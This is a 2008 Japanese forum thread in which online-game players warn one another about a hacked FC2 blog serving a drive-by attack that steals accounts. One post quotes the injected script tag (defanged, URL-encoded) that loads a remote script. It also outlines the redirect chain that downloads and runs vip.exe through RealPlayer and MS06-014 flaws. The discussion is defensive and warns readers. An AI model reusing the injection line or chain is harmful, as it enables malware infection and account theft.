●● RMT業者の垢ハックが多発している件13 ●●

このエントリーをはてなブックマークに追加
701既にその名前は使われています:2008/03/21(金) 22:10:51.38 ID:pYrp5DdK
保守
702既にその名前は使われています:2008/03/21(金) 23:51:13.45 ID:ci/XUxd4
週刊オンラインゲームアップデートレポート
http://www.watch.impress.co.jp/game/docs/20080321/on0321.htm
アカウント盗用を目的とした大規模なニュースが報じられる
被害に遭う前に、セキュリティの見直しを
703既にその名前は使われています:2008/03/22(土) 00:14:58.86 ID:RUXIxuA/
age
704既にその名前は使われています:2008/03/22(土) 01:27:56.83 ID:8t/nHuh6
注意喚起注意喚起
705既にその名前は使われています:2008/03/22(土) 02:20:55.58 ID:MmHd1tKd
706既にその名前は使われています:2008/03/22(土) 04:19:24.27 ID:uo3kZ88u
パス抜きのウィルスってルータ経由で感染するのか…。
PC知識限りなく0でエロサイト巡回が趣味で自分のPCを誰にも触らせない弟がいる俺オワタ。
707既にその名前は使われています:2008/03/22(土) 06:03:41.92 ID:D48bOfj+
>>706
ルーターがあるなら弟のPCと自分のPCを別セグメントにしてPC間で通信できないよ
うにすればいいんじゃねーの?
708既にその名前は使われています:2008/03/22(土) 07:54:23.50 ID:pcABNhlC
また購入者〜スレ落ちたにゃ、もう慣れっこにゃ
春休みパワー凄いなw
709既にその名前は使われています:2008/03/22(土) 08:17:31.87 ID:RvtYUyWm
>>707

>>706はセグメント超えとブロードバンドルータ配下にぶら下がる同一セグメント内のHUB経由接続の
区別が分かってないと思うけど。
710既にその名前は使われています:2008/03/22(土) 09:21:30.87 ID:s/p1nPgY
ペコろぐに罠が仕込まれていたかも・・・気をつけて!
JSに書かれたURLエンコードされてるアドレスを辿っていくと、
下のアドレスのページを読み込んでいたみたい。
http://www■hellh■net/vip.htm
http://www■hellh■net/dv.htm

今は消されているのかな?
ソースチェッカーオンラインで調べたら、キャッシュを見ているせいか罠っぽいJSも残ってた。
今週末もやばそうだ・・・
711既にその名前は使われています:2008/03/22(土) 09:51:03.42 ID:QQIop/6A
>>710
hellhは罠アド。
気をつけて!
712既にその名前は使われています:2008/03/22(土) 09:53:41.65 ID:mnXb1A/y
上にもあったけど公式のLSコミュニティが乗っとられたら被害すごそうだね
パス入力したら業者に筒抜けとかなったら頭がおかしくなって死ぬ
あぐる
713既にその名前は使われています:2008/03/22(土) 10:34:32.75 ID:5TeUNyVm
>>710
消されていない。
今のhellhはASPで制御を行っている(HTTPヘッダのContentで飛ばす)。
ページ構造は
Default.htm
→head.asp
 →(初回) error.htm
  →dv.htm (スクリプトその1)
  →vip.htm (スクリプトその2)
 →(次回) http://search.fc2.com
スクリプトはvip.exeをダウンロードし実行。
使う脆弱性は以前と変わってなければRealPlayerとMS06-014。
714既にその名前は使われています:2008/03/22(土) 10:57:04.98 ID:GEHSzlCf
ぺこログをソースチェッカーオンラインにかけてソース参照して見てるんだが
罠が仕込まれてる箇所が見当たらない。
すまないが自分のところチェックしたいから
もう少し噛み砕いて詳しい場所を教えてもらえないだろうか?
715既にその名前は使われています:2008/03/22(土) 11:04:34.06 ID:5TeUNyVm
iframeじゃなくてscript。
URIはエンコしてある。
716既にその名前は使われています:2008/03/22(土) 11:05:06.00 ID:s/p1nPgY
>>713
詳しい説明ありがとう

>>714
二つ目の ▲▲ プラグイン カテゴリー1 ▲▲ の下にあったよ
717既にその名前は使われています:2008/03/22(土) 11:09:05.70 ID:HbzOlOUL
FC2マジでやばいな
今日はFC2ブログを見に行かないほうがいい

現時点でぺころぐが黒なのは確定?
718既にその名前は使われています:2008/03/22(土) 11:11:46.14 ID:GEHSzlCf
>>716
トンクス!
今見てるソースだと以下のようになってるから消えてってことなのかな。
とりあえず自分のトコもみてくるは。
<!--▲▲ プラグイン カテゴリー1 ▲▲-->


<!--▼▼ プラグイン無効時の表示 ▼▼-->
<!--▲▲ プラグイン無効時の表示 ▲▲-->


<!--▼▼ プラグイン カテゴリー2 ▼▼-->
719既にその名前は使われています:2008/03/22(土) 11:21:31.11 ID:s/p1nPgY
>>718
自分でペコログを直に見に行った時もそう表示されてた。
だから既に消されてるのかと思ったんだよね
713が見つけた罠は別の部分なのかもしれない。
720既にその名前は使われています:2008/03/22(土) 11:22:05.54 ID:u73ogFcu
ウィルス対策ソフトMcAfeeなんだけどPC起動時に自動起動のはずが
エラーで落ちちゃうんだよね。
再起動してもだめだったからもしやとおもいカスペでオンラインスキャン中

残り30%で
見つかったウィルス1、感染したオブジェクト1

ウィルス悪さしてMcAfee起動とめてたのかな・・
とりあえずトライアル版落として駆除してみます

721既にその名前は使われています:2008/03/22(土) 11:35:37.70 ID:5TeUNyVm
>>718-719
普通にトップページのソース見てみ。頭のほうに
<script src="hxxp://%77%77%77%2E%68%65%6C%6C%68%2E%6E%65%74/%77%2E%6A%73"></script>
があるでしょ(踏まないようhttpはhxxpにしてある)。
722既にその名前は使われています:2008/03/22(土) 11:51:51.97 ID:HbzOlOUL
>721
気になったのでダウンロードツールでindexをファイルとして落としてみた
FC2のアクセス解析のアドレスがwww■hellh■net/w.js になってるんですが・・・

おいおい、やばくね?
723既にその名前は使われています:2008/03/22(土) 11:55:22.72 ID:s/p1nPgY
>>721
ありがとーばっちりあったw
724既にその名前は使われています:2008/03/22(土) 11:57:08.47 ID:RUXIxuA/
これはネ実全体に注意を促したほうがいいような
725既にその名前は使われています:2008/03/22(土) 12:01:20.68 ID:GEHSzlCf
>>721
見落としたのかわからんけど、今みたらしっかりとあった。トンクス。
アクセス解析の直下か・・・
726既にその名前は使われています:2008/03/22(土) 12:04:28.37 ID:5TeUNyVm
scriptも使えるってのは >>276 で、
hellhが更新されてるってのは >>626 で書いた(´・ω・`)
727既にその名前は使われています:2008/03/22(土) 12:05:14.07 ID:s/p1nPgY
一番読者が多そうなサルスレでは既に話題になってるよ
728既にその名前は使われています:2008/03/22(土) 12:08:06.14 ID:RUXIxuA/
立ててみた

FC2ブログを見に行くと垢ハックされるぞ
http://live27.2ch.net/test/read.cgi/ogame/1206155257/
729既にその名前は使われています:2008/03/22(土) 12:12:56.10 ID:5TeUNyVm
FC2全体がやられているわけじゃないのに…。
私のブログもFC2。誰も来ないけどね!
730既にその名前は使われています:2008/03/22(土) 12:17:43.23 ID:RUXIxuA/
浮上
731既にその名前は使われています:2008/03/22(土) 13:06:28.35 ID:1nSfINA3
ペコろぐ見ただけで感染するの?
数時間前に見てもうヴァナにもインしちゃったんだけど・・・
732既にその名前は使われています:2008/03/22(土) 13:10:50.27 ID:ePhB4KTm
>>731
windows updateやブラウザなどにもよるが、
その可能性が高いってことだな。
今すぐカスペルスキーオンラインスキャンとか複数の
スキャンサービスでチェックしておけ。
733既にその名前は使われています:2008/03/22(土) 13:11:20.75 ID:2EgMgjZt
ネット見ないPCかPS2は持ってないの?
734既にその名前は使われています:2008/03/22(土) 13:11:54.42 ID:5TeUNyVm
IE(およびIEコンポーネントブラウザ)で、
以下のいずれかを満たせば感染する可能性がある。
・WindowsUpdateをしていない。
・RealPlayerが入っている。
735既にその名前は使われています:2008/03/22(土) 13:14:40.55 ID:vocyVObw
つまりFirefoxかOpera最強って事か
736既にその名前は使われています:2008/03/22(土) 13:14:55.35 ID:YN+ttw1L
注意喚起あげ
737既にその名前は使われています:2008/03/22(土) 13:18:21.98 ID:wCa2Bfwz
>>731
さようならw
738既にその名前は使われています:2008/03/22(土) 13:19:55.51 ID:ndD5A19m
>>731
無茶しやがって・・・
739既にその名前は使われています:2008/03/22(土) 13:27:02.59 ID:5TeUNyVm
>>735
今はSafariもあるぜ。
現時点でWindowsでは最も狙われていないブラウザだ(元はMac用だが)。
740既にその名前は使われています:2008/03/22(土) 13:35:56.23 ID:vocyVObw
Safariもいいんだけど、重い&仕様の問題で
よく見るサイトでレイアウト崩れるところがあってさw
Firefoxでも同じだけどね。うーむ
741既にその名前は使われています:2008/03/22(土) 13:41:08.83 ID:hVrvaUvQ
マイナーで狙われないって条件ならAmaya10.0ってのも
742720:2008/03/22(土) 13:41:32.21 ID:u73ogFcu
汗って書き込んでしまったがWinny.exeをマルチウェアとして検知してただけだったw
もうつかってもないし削除しといたわ

マカフィー起動できないのはただの不具合っぽい
問い合わせたら再インストールよろwだった。

このハックまっさかりな時期だからはやとちりしてしまった。
743既にその名前は使われています:2008/03/22(土) 13:47:06.09 ID:Sk+5Gwm0
>>742
何事もなかったのは何よりだが、あまりよろしくない原因だな
744既にその名前は使われています:2008/03/22(土) 13:49:51.04 ID:5TeUNyVm
>>741
それはマイナー過ぎるw
745既にその名前は使われています:2008/03/22(土) 14:04:32.06 ID:ZC/O1gOR
いくらIEでもセキュリティー設定を「高」にしてれば感染しようがないよね?
746既にその名前は使われています:2008/03/22(土) 14:04:37.31 ID:hVrvaUvQ
日本語表示が困難つーか無謀なんだけどねAmaya
747既にその名前は使われています:2008/03/22(土) 14:31:19.75 ID:Jiv6k8QH
>>745
それですむなら苦労しない
748既にその名前は使われています:2008/03/22(土) 14:39:20.62 ID:ZC/O1gOR
>>747
真面目な話、どうやって感染させるの?
JavaもJavascriptもActiveXも無効な状態でどうやってトロイをダウソさせるの?
749既にその名前は使われています:2008/03/22(土) 14:41:28.59 ID:Qnt4FZ/o
>>748
そう思うなら、その設定で満足すればいいじゃない。
750既にその名前は使われています
>>749
煽るだけなら無駄なレスをしないでくれ